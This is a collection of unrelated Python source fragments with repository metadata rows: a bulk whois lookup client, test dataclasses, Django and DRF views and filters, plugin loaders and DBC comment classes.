self.leader = leader
self.footer = footer
self.server = server
self.port = port
self.record_delim = record_delim
self.field_delim = field_delim
self.has_result_header = has_result_header
def _lookup(self, ip_list):
"""
Take a list of IP addresses, format them according to the
whois server spec, connect on the specified port, send the
formatted data, return the data received.
Raises:
IOError on any connection problems
"""
result = ""
ip_list = self._filter_ipv4(ip_list)
query = self._format_list(ip_list)
try:
tn = telnetlib.Telnet(self.server, self.port)
tn.write(query)
result = tn.read_all()
tn.close()
except socket.gaierror as se:
raise IOError("Couldn't connect to %s:%s" % (self.server,
self.port))
except EOFError as ee:
raise IOError("Server dropped connection")
return result
def lookup_ips_raw(self, ip_list):
"""
Get the raw output returned by the whois server as a string.
"""
return self._lookup(ip_list)
def lookup_ips(self, ip_list):
"""
Return a dict of dicts indexed by IP address with whois
results.
Ensure that the "ip" field exists in the field_names array in the
position of the IP address.
Args:
ip_list: an array of IP addresses. We don't check that
the IP addresses are valid: the whois server will not return
a result for invalid addresses.
Returns:
A dict mapping records by IP address. Dict fields are named
according to the fields_name array.
Raises:
ValueError is "ip" field is not set in field_names.
"""
raw = self._lookup(ip_list)
records = {}
        if "ip" not in self.field_names:
            raise ValueError("You need to include an 'ip' field in the field_names array.")
        ip_index = self.field_names.index("ip")
for line_num, line in enumerate(raw.split(self.record_delim)):
# some whois results have a header we'll throw away
if line_num == 0 and self.has_result_header:
                continue
fields = line.split(self.field_delim)
            # many fields are space-padded, so strip whitespace
fields = [field.strip() for field in fields]
if len(fields) < len(self.field_names):
                # skip this line: malformed, or doesn't match our template
pass
else:
records.setdefault(fields[ip_index], dict(zip(self.field_names, fields)))
return records
def _filter_ipv4(self, ip_list):
clean_ips = []
for ip in ip_list:
try:
socket.inet_pton(socket.AF_INET, ip)
except socket.error:
logging.info("'%s' isn't an IPv4 address: ignoring" % str(ip))
else:
clean_ips.append(ip)
return clean_ips
def _format_list(self, ip_list):
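        # With the default leader/footer/record_delim this produces, for example:
        #   "begin\n192.168.0.1\n10.1.1.1\nend\n"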
return self.record_delim.join([self.leader, self.record_delim.join(ip_list), \
self.footer]) + self.record_delim
if __name__ == "__main__":
lookups = ["201.21.203.254", "203.21.203.254", "130.102.6.192", "192.168.0.10", "203.20.1.2", "200.200.200.200", "8.8.8.8"]
bw = BulkWhois(leader="begin origin")
bw.field_names=["ip", "asn", "bgp_prefix", "as_name", "cc", "register", "org_name"]
print bw.lookup_ips_raw(lookups)
print bw.lookup_ips(lookups)
bw2 = BulkWhois(leader="begin\nverbose", server="asn.cymru.coma")
bw2.field_names=["asn", "ip", "bgp_prefix", "cc", "registry", "allocated", "as_name"]
print bw2.lookup_ips_raw(lookups)
print bw2.lookup_ips(lookups)
| 34.793296 | 127 | 0.581728 |
4a1e33cbb1d94b8d8f563aa9996d50c6e85a125e | 149 | py | Python | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 29 | 2020-03-26T08:25:14.000Z | 2022-03-14T08:44:39.000Z | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 35 | 2020-05-12T06:21:03.000Z | 2022-03-04T10:32:19.000Z | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 12 | 2020-05-18T21:02:13.000Z | 2022-03-25T13:44:46.000Z | from dataclasses import dataclass
@dataclass(frozen=False)
class Address:
public_key: str
private_key: str
address: str
index: int
| 14.9 | 33 | 0.718121 |
4a1e33cea933d5c3a1089d13cc6ee90e4658a5ba | 553 | py | Python | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | digideskio/dataservices-api | 246ec135dbeaa3f9a52717fdac50a4ab040ce22b | [
"BSD-3-Clause"
] | 22 | 2016-03-11T17:33:31.000Z | 2021-02-22T04:00:43.000Z | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | digideskio/dataservices-api | 246ec135dbeaa3f9a52717fdac50a4ab040ce22b | [
"BSD-3-Clause"
] | 338 | 2016-02-16T16:13:13.000Z | 2022-03-30T15:50:17.000Z | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | CartoDB/dataservices-api | d0f28cc002ef11df9f371d5d1fd2d0901c245f97 | [
"BSD-3-Clause"
] | 14 | 2016-09-22T15:29:33.000Z | 2021-02-08T03:46:40.000Z | from cartodb_services.refactor.storage.server_config import InDbServerConfigStorage
class ServerConfigBackendFactory(object):
"""
This class creates a backend to retrieve server configurations (implementing the ConfigBackendInterface).
    At the moment it always returns an InDbServerConfigStorage, but nothing prevents swapping the
    implementation for something that reads from a file, memory or elsewhere. It is mostly there to keep
    the layers separated.
"""
def get(self):
return InDbServerConfigStorage()
| 39.5 | 109 | 0.777577 |
4a1e33ee5ed0739a445e4048fcddce18aac6d4c7 | 631 | py | Python | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gazoo Device Manager version."""
version = "1.33.0"
| 37.117647 | 74 | 0.751189 |
4a1e3430abe789126ea345c97d4cde1997f8ab5d | 1,107 | py | Python | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-25T03:22:52.000Z | 2017-11-25T03:22:52.000Z | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def get_core_plugins():
from robotide.run import RunAnything
from robotide.recentfiles import RecentFilesPlugin
from robotide.ui.preview import PreviewPlugin
from robotide.ui.keywordsearch import KeywordSearch
from robotide.editor import EditorPlugin
from robotide.editor.texteditor import TextEditorPlugin
from robotide.log import LogPlugin
return [RunAnything, RecentFilesPlugin, PreviewPlugin,
EditorPlugin, TextEditorPlugin, KeywordSearch, LogPlugin]
| 41 | 75 | 0.769648 |
4a1e344baa9d52ad1255402d81c02e71a023d18a | 337 | py | Python | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | null | null | null | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | 17 | 2018-03-07T15:52:42.000Z | 2022-03-12T01:07:06.000Z | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | 1 | 2018-07-23T22:13:45.000Z | 2018-07-23T22:13:45.000Z | from __future__ import unicode_literals
from django.views.generic import TemplateView
from cradmin_legacy import crapp
class DashboardView(TemplateView):
template_name = 'no_role_demo/dashboard.django.html'
class App(crapp.App):
appurls = [
crapp.Url(r'^$', DashboardView.as_view(), name=crapp.INDEXVIEW_NAME)
]
| 22.466667 | 76 | 0.753709 |
4a1e355ecd84746004ec1d71828260fe8319de29 | 8,053 | py | Python | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | 2 | 2016-11-11T21:46:23.000Z | 2016-11-14T08:06:38.000Z | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | null | null | null | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
DOCUMENTATION = '''
---
module: bigip_irule_bigsuds
short_description: Manage iRules on a BIG-IP.
description:
- Manage iRules on a BIG-IP.
version_added: "2.2"
notes:
- "Requires BIG-IP software version >= 9"
- "F5 developed module 'bigsuds' required (see http://devcentral.f5.com)"
- "Best run as a local_action in your playbook"
- "Inspired by the `bigip_virtual_server` module by Etienne Carriere (@Etienne-Carriere) and Tim Rupp (@caphrim007)"
requirements:
- bigsuds
author:
- Ryan Conway (@rylon)
options:
content:
description:
- When used instead of 'src', sets the contents of an iRule directly to
the specified value. This is for simple values, but can be used with
lookup plugins for anything complex or with formatting. Either one
of C(src) or C(content) must be provided.
partition:
description:
- The partition to create the iRule in.
required: false
default: Common
name:
description:
- The name of the iRule.
required: true
src:
description:
- The iRule file to interpret and upload to the BIG-IP. Either one
of C(src) or C(content) must be provided.
        required: false
state:
description:
- Whether the iRule should exist or not.
required: false
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
'''
EXAMPLES = '''
- name: Add an irule with inline content
delegate_to: localhost
bigip_irule_bigsuds:
state: "present"
server: "lb.mydomain.com"
validate_certs: false
user: "username"
password: "password"
partition: "my_partition"
name: "my_irule"
content: "when HTTP_REQUEST { HTTP::header insert "MY_TEST_HEADER" "testing" }"
- name: Add an irule by reading from a specific file
delegate_to: localhost
bigip_irule_bigsuds:
state: "present"
server: "lb.mydomain.com"
validate_certs: false
user: "username"
password: "password"
partition: "my_partition"
name: "my_irule"
src: "/path/to/rule.tcl"
'''
RETURN = '''
action:
description: Shows the type of modification made, if there were changes, for example "updated", "deleted", "created"
returned: changed
type: string
sample: "updated"
irule_name:
description: The fully qualified irule name
returned: changed and success
type: string
sample: "/my_partition/my_irule"
'''
def irule_exists(api, name):
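    # bigsuds raises OperationFailed containing "was not found" when the iRule
    # does not exist; map that to False and re-raise any other failure.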
result = False
try:
api.LocalLB.Rule.query_rule(rule_names=[name])
result = True
except bigsuds.OperationFailed as e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def irule_create(api, name, content):
api.LocalLB.Rule.create(rules=[ {'rule_name': name, 'rule_definition': content} ])
def irule_update(api, name, content, diff_enabled):
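    # Only issue modify_rule when the stored definition differs from the desired
    # content; optionally attach a before/after diff for --diff runs.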
updated = {'changed': False, 'irule_name': name}
existing_irule = irule_get(api, name)
if existing_irule['rule_definition'] != content:
api.LocalLB.Rule.modify_rule(rules=[ {'rule_name': name, 'rule_definition': content} ])
updated['changed'] = True
updated['action'] = 'updated'
if diff_enabled:
updated['diff'] = {
'before_header': name,
'before': existing_irule['rule_definition'],
'after_header': name,
'after': content
}
return updated
def irule_get(api, name):
# Example response: [{'rule_name': '/my_partition/my_irule', 'rule_definition': '<irule code goes here>'}]
return api.LocalLB.Rule.query_rule(rule_names=[name])[0]
def irule_remove(api, name):
api.LocalLB.Rule.delete_rule(rule_names=[name])
def main():
argument_spec = f5_argument_spec()
argument_spec.update(dict(
state=dict(type='str', default='present',
choices=['present', 'absent']),
name=dict(type='str', required=True),
content=dict(required=False, default=None),
src=dict(required=False, default=None),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['content', 'src']
]
)
if not bigsuds_found:
module.fail_json(msg="the python bigsuds module is required")
if module.params['validate_certs']:
import ssl
if not hasattr(ssl, 'SSLContext'):
module.fail_json(msg='bigsuds does not support verifying certificates with python < 2.7.9. Either update python or set validate_certs=False on the task')
server = module.params['server']
server_port = module.params['server_port']
user = module.params['user']
password = module.params['password']
partition = module.params['partition']
validate_certs = module.params['validate_certs']
state = module.params['state']
name = fq_name(partition, module.params['name']) # Fully Qualified name (including the partition)
# Irule contents can either be defined inline via 'content' attribute, or by passing the path to
# a file via 'src' attribute, for the latter we need to read those contents from the file.
content = None
if module.params['src']:
try:
with open(module.params['src']) as f:
content = f.read()
except Exception as e:
raise Exception('Error reading iRule "src" file : %s' % e)
else:
content = module.params['content']
try:
api = bigip_api(server, user, password, validate_certs, port=server_port)
result = {'changed': False, 'irule_name': name} # default module return value
if state == 'absent':
# Check mode is disabled
if not module.check_mode:
if irule_exists(api, name):
try:
irule_remove(api, name)
result = {'changed': True, 'action': 'deleted'}
except bigsuds.OperationFailed as e:
# Handles the situation where the irule was deleted in between us querying for its existence and running the delete command.
if "was not found" in str(e):
result['changed'] = False
else:
raise
# Check mode is enabled
else:
result = {'changed': True}
# State is 'present'
else:
# Check mode is disabled
if not module.check_mode:
# If the irule doesn't exist we can create it.
if not irule_exists(api, name):
try:
irule_create(api, name, content)
result = {'changed': True, 'action': 'created'}
except Exception as e:
raise Exception('Error creating iRule : %s' % e)
# The irule already exists so we need to check if it has the correct content
# and update it only if necessary, so Ansible can report 'changed' correctly.
else:
try:
result = irule_update(api, name, content, module._diff)
except Exception as e:
raise Exception("Error updating iRule : %s" % e)
            # Check mode is enabled
else:
# check-mode return value
result = {'changed': True}
except Exception as e:
module.fail_json(msg="Received exception: %s" % e)
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
if __name__ == '__main__':
main()
| 32.603239 | 166 | 0.594934 |
4a1e365eb6623694467025066d11c95f56a7bafe | 2,523 | py | Python | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 92 | 2018-08-29T12:35:55.000Z | 2022-03-21T01:18:57.000Z | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 111 | 2018-08-15T12:17:44.000Z | 2022-03-09T19:31:33.000Z | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 20 | 2018-08-23T17:19:09.000Z | 2021-12-15T19:36:54.000Z | """Módulo 'strings' de georef-ar-api
Contiene mensajes de error en forma de texto para usuarios.
"""
ADDRESS_FORMAT = 'La dirección debe seguir alguno de los formatos listados \
bajo la clave \'ayuda\'.'
ADDRESS_FORMAT_HELP = [
'<nombre de calle>',
'<nombre de calle> <altura>'
]
STRING_EMPTY = 'El campo no tiene contenido.'
INT_VAL_ERROR = 'El parámetro no es un número entero.'
FLOAT_VAL_ERROR = 'El parámetro no es un número real.'
INVALID_CHOICE = 'El parámetro debe tomar el valor de uno de los listados \
bajo la clave \'ayuda\'.'
INVALID_BULK = 'Las operaciones deben estar contenidas en una lista no vacía \
bajo la clave \'{}\'.'
BULK_QS_INVALID = 'No se permiten parámetros vía query string en operaciones \
bulk.'
INVALID_BULK_ENTRY = 'Las operaciones bulk deben ser de tipo objeto.'
INTERNAL_ERROR = 'Ocurrió un error interno de servidor al procesar la \
petición.'
MISSING_ERROR = 'El parámetro \'{}\' es obligatorio.'
UNKNOWN_ERROR = 'El parámetro especificado no existe. Los parámetros \
aceptados están listados bajo la clave \'ayuda\'.'
REPEATED_ERROR = 'El parámetro está repetido.'
BULK_LEN_ERROR = 'El número máximo de operaciones bulk es: {}.'
INT_VAL_SMALL = 'El número debe ser igual o mayor que {}.'
INT_VAL_BIG = 'El número debe ser menor o igual que {}.'
INT_VAL_BIG_GLOBAL = 'La suma de parámetros {} debe ser menor o igual \
que {}.'
NOT_FOUND = 'No se encontró la URL especificada.'
NOT_ALLOWED = 'Método no permitido en el recurso seleccionado.'
ID_PARAM_INVALID = 'Cada ID debe ser numérico y de longitud {}.'
ID_PARAM_LENGTH = 'La cantidad de ID debe ser menor o igual que {}.'
ID_PARAM_UNIQUE = 'La lista no debe contener ID repetidos (ID repetido: {}).'
COMPOUND_PARAM_ERROR = 'El valor del parámetro no es válido.'
FIELD_LIST_EMPTY = 'La lista no contiene valores.'
FIELD_LIST_REPEATED = 'La lista contiene valores repetidos.'
FIELD_LIST_INVALID_CHOICE = 'El parámetro debe consistir en una lista de \
ítems separados por comas. Los valores posibles de los ítems se listan bajo \
la clave \'ayuda\'. Alternativamente, se pueden especificar los valores \
\'basico\', \'estandar\' o \'completo\'.'
FIELD_INTERSECTION_FORMAT = 'El parámetro debe seguir el siguiente formato: \
<tipo de entidad>:<id>, <tipo de entidad>:<id>, ... (ver ejemplos bajo la \
clave ayuda).'
FIELD_INTERSECTION_FORMAT_HELP = [
'provincia:94:38',
'municipio:740038, departamento:74049',
'departamento:62035:62007:62084',
'municipio:700070:700049, provincia:02',
'departamento:14028'
]
| 45.872727 | 78 | 0.742767 |
4a1e3679a683cb0391108e789817e80e75de1b93 | 8,270 | py | Python | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 21 | 2017-10-08T23:19:47.000Z | 2020-01-16T20:02:08.000Z | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 6 | 2020-06-03T05:30:52.000Z | 2022-01-13T00:44:26.000Z | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 9 | 2017-10-09T22:58:31.000Z | 2021-11-20T15:20:18.000Z | # -*- coding: utf-8 -*-
import time
import datetime
import traceback
import djangoplus
from selenium import webdriver
from django.conf import settings
from django.utils.translation import ugettext as _
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import WebDriverException
class Browser(webdriver.Firefox):
def __init__(self, server_url, options=None, verbose=True, slowly=False, maximize=True, headless=False):
if not options:
options = Options()
if maximize:
options.add_argument("--start-maximized")
else:
options.add_argument("--window-size=720x800")
if headless or djangoplus.test.CACHE['HEADLESS']:
options.add_argument("--headless")
super(Browser, self).__init__(options=options)
self.verbose = verbose
self.slowly = slowly
self.watched = False
self.server_url = server_url
if maximize:
self.maximize_window()
else:
self.set_window_position(700, 0)
self.set_window_size(720, 800)
self.switch_to.window(self.current_window_handle)
def slow_down(self):
self.slowly = True
def speed_up(self):
self.slowly = False
def wait(self, seconds=1):
time.sleep(seconds)
def watch(self, e):
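        # First failure: print the traceback, save a screenshot and pause for
        # manual inspection (unless headless). Later failures are re-raised.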
if self.watched:
raise e
else:
traceback.print_exc()
self.watched = True
self.save_screenshot('/tmp/test.png')
if not djangoplus.test.CACHE['HEADLESS']:
input('Type enter to continue...')
def print(self, message):
if self.verbose:
print(message)
def execute_script(self, script, *args):
super(Browser, self).execute_script(script, *args)
if self.slowly:
self.wait(3)
def open(self, url):
self.get("{}{}".format(self.server_url, url))
def back(self, seconds=None):
if seconds:
self.wait(seconds)
if not self.current_url or not self.current_url.endswith('/admin/'):
self.open('/admin/')
def enter(self, name, value, submit=False, count=2):
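        # Fills the form field via the page's enter() JS helper, retrying up to
        # `count` times on WebDriverException before handing the error to watch().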
if callable(value):
value = value()
if type(value) == datetime.date:
value = value.strftime('%d/%m/%Y')
if value:
self.print('{} "{}" for "{}"'.format('Entering', value, name))
try:
if submit:
self.execute_script("enter('{}', '{}', 1)".format(name, value))
else:
self.execute_script("enter('{}', '{}')".format(name, value))
elements = self.find_elements_by_name('hidden-upload-value')
for element in elements:
element_id, file_path = element.get_property('value').split(':')
if file_path.startswith('/static'):
file_path = '{}/{}/{}'.format(settings.BASE_DIR, settings.PROJECT_NAME, file_path)
self.find_element_by_id(element_id).send_keys(file_path)
except WebDriverException as e:
if count:
self.wait()
self.enter(name, value, submit, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def choose(self, name, value, count=2):
self.print('{} "{}" for "{}"'.format('Choosing', value, name))
try:
headless = djangoplus.test.CACHE['HEADLESS'] and 'true' or 'false'
self.execute_script("choose('{}', '{}', {})".format(name, value, headless))
self.wait(2)
except WebDriverException as e:
if count:
self.wait()
self.choose(name, value, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def dont_see_error_message(self, testcase=None):
elements = self.find_elements_by_class_name('alert-danger')
if elements:
messages = [element.text for element in elements]
if not djangoplus.test.CACHE['HEADLESS']:
input('Type enter to continue...')
elif testcase:
exception_message = 'The following messages were found on the page: {}'.format(';'.join(messages))
raise testcase.failureException(exception_message)
def see(self, text, flag=True, count=2):
if flag:
self.print('See "{}"'.format(text))
try:
assert text in self.find_element_by_tag_name('body').text
except WebDriverException as e:
if count:
self.wait()
self.see(text, flag, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
else:
self.print('Can\'t see "{}"'.format(text))
assert text not in self.find_element_by_tag_name('body').text
def look_at_popup_window(self, count=2):
self.print('Looking at popup window')
try:
self.execute_script("lookAtPopupWindow()")
except WebDriverException as e:
if count:
self.wait()
self.look_at_popup_window(count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def look_at(self, text, count=2):
        self.print('Looking at "{}"'.format(text))
try:
self.execute_script("lookAt('{}')".format(text))
except WebDriverException as e:
if count:
self.wait()
self.look_at(text, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def look_at_panel(self, text, count=2):
self.print('Looking at panel "{}"'.format(text))
try:
self.execute_script("lookAtPanel('{}')".format(text))
except WebDriverException as e:
if count:
self.wait()
self.look_at_panel(text, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def check(self, text=None):
self.print('Checking "{}"'.format(text))
try:
if text:
self.execute_script("check('{}')".format(text))
else:
self.execute_script("check()")
except WebDriverException as e:
self.watch(e)
self.wait()
def click_menu(self, *texts):
self.print('Clicking menu "{}"'.format('->'.join(texts)))
self.wait()
for text in texts:
self.wait()
try:
self.execute_script("clickMenu('{}')".format(text.strip()))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_link(self, text):
self.print('Clicking link "{}"'.format(text))
try:
self.execute_script("clickLink('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_button(self, text):
self.print('Clicking button "{}"'.format(text))
try:
self.execute_script("clickButton('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
self.dont_see_error_message()
def click_tab(self, text):
self.print('Clicking tab "{}"'.format(text))
try:
self.execute_script("clickTab('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_icon(self, name):
self.print('Clicking icon "{}"'.format(name))
try:
self.execute_script("clickIcon('{}')".format(name))
except WebDriverException as e:
self.watch(e)
self.wait()
def logout(self):
self.print('Logging out')
self.click_icon(_('Settings'))
self.wait()
self.click_link(_('Logout'))
self.wait()
def close(self, seconds=0):
self.wait(seconds)
super(Browser, self).close()
| 32.948207 | 114 | 0.542443 |
4a1e372600e415f6c95a0a392afb3a06743da406 | 2,345 | py | Python | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | from scout.models.hgnc_map import Exon
def build_exon(exon_info, build='37'):
"""Build a Exon object object
Args:
exon_info(dict): Exon information
Returns:
exon_obj(Exon)
"exon_id": str, # str(chrom-start-end)
"chrom": str,
"start": int,
"end": int,
"transcript": str, # ENST ID
"hgnc_id": int, # HGNC_id
"rank": int, # Order of exon in transcript
"strand": int, # 1 or -1
"build": str, # Genome build
"""
try:
ensembl_exon_id = exon_info['ens_exon_id']
except KeyError:
raise KeyError("Exons has to have a ensembl_exon_id")
try:
chrom = str(exon_info['chrom'])
except KeyError:
raise KeyError("Exons has to have a chromosome")
try:
start = int(exon_info['start'])
except KeyError:
raise KeyError("Exon has to have a start")
except TypeError:
raise TypeError("Exon start has to be integer")
try:
end = int(exon_info['end'])
except KeyError:
raise KeyError("Exon has to have a end")
except TypeError:
raise TypeError("Exon end has to be integer")
try:
rank = int(exon_info['rank'])
except KeyError:
raise KeyError("Exon has to have a rank")
except TypeError:
raise TypeError("Exon rank has to be integer")
try:
strand = int(exon_info['strand'])
except KeyError:
raise KeyError("Exon has to have a strand")
except TypeError:
raise TypeError("Exon strand has to be integer")
try:
exon_id = exon_info['exon_id']
except KeyError:
raise KeyError("Exons has to have a id")
try:
transcript = exon_info['transcript']
except KeyError:
raise KeyError("Exons has to have a transcript")
try:
hgnc_id = int(exon_info['hgnc_id'])
except KeyError:
raise KeyError("Exons has to have a hgnc_id")
except TypeError:
raise TypeError("hgnc_id has to be integer")
exon_obj = Exon(
exon_id = exon_id,
chrom = chrom,
start = start,
end = end,
strand = strand,
rank = rank,
transcript = transcript,
hgnc_id = hgnc_id,
build = build,
)
return exon_obj
| 25.769231 | 61 | 0.575267 |
4a1e372775f4def9dca81077b789373539d19ef5 | 384 | py | Python | languages/python/1.learn_py_the_hard_way/ex10.py | banminkyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | 4 | 2022-01-18T00:57:20.000Z | 2022-03-31T02:41:54.000Z | languages/python/1.learn_py_the_hard_way/ex10.py | kyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | null | null | null | languages/python/1.learn_py_the_hard_way/ex10.py | kyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | null | null | null | print("I am 6'2\" tall.") # escape double-quote inside string
print('I am 6\'2" tall.') # escape single-quote inside string
tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = """
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
"""
print(tabby_cat)
print(persian_cat)
print(backslash_cat)
print(fat_cat)
| 20.210526 | 61 | 0.671875 |
4a1e372f4ac45d55da35c2f37f647db6c5887eae | 1,600 | py | Python | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | from rest_framework import filters
class IsOwnerFilterBackend(filters.BaseFilterBackend):
'''Filters objects which were created by the request user'''
def filter_queryset(self, request, queryset, view):
return queryset.filter(owner=request.user)
class RecipeTagsFilterBackend(filters.BaseFilterBackend):
'''Filters recipes by the tags'''
def filter_queryset(self, request, queryset, view):
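        # `tags` is expected as a comma-separated list of ids, e.g. ?tags=1,3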
tags_str = request.query_params.get('tags')
if tags_str:
list_tags = [int(i) for i in tags_str.split(',')]
return queryset.filter(tags__id__in=list_tags)
return queryset
class RecipeIngredientsFilterBackend(filters.BaseFilterBackend):
'''Filters recipes by the ingredients'''
def filter_queryset(self, request, queryset, view):
ingr_str = request.query_params.get('ingredients')
if ingr_str:
list_ingrs = [int(i) for i in ingr_str.split(',')]
return queryset.filter(ingredients__id__in=list_ingrs)
return queryset
class AssignedToRecipeFilterBackend(filters.BaseFilterBackend):
'''
    Filters tags or ingredients by whether or not they are assigned to a recipe
'''
def filter_queryset(self, request, queryset, view):
assigned = (request.query_params.get('assigned') == '1')
not_assigned = (request.query_params.get('not_assigned') == '1')
if assigned:
return queryset.filter(recipe__isnull=False).distinct()
elif not_assigned:
return queryset.filter(recipe__isnull=True).distinct()
return queryset
| 37.209302 | 77 | 0.69 |
4a1e375bbf8ed093e6c3be533314b03509139695 | 2,711 | py | Python | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | 8 | 2021-02-18T07:16:16.000Z | 2022-03-23T11:55:52.000Z | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | null | null | null | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | 3 | 2021-02-19T14:27:34.000Z | 2022-03-23T11:55:53.000Z |
class Comment(str):
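    # Renders a DBC comment (CM_) entry; subclasses bind the text to a node,
    # message, signal or environment variable.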
_fmt = 'CM_ "{comment}" ;'
def format(self, *args, **kwargs):
return self._fmt.format(comment=self.replace('"', '\\"'))
class NodeComment(Comment):
_fmt = 'CM_ BU_ {name} "{comment}" ;'
def __init__(self, value):
self._node = None
try:
super(NodeComment, self).__init__(value)
except TypeError:
super(NodeComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
name=self._node.name,
comment=self.replace('"', '\\"')
)
@property
def node(self):
return self._node
@node.setter
def node(self, value):
self._node = value
class MessageComment(Comment):
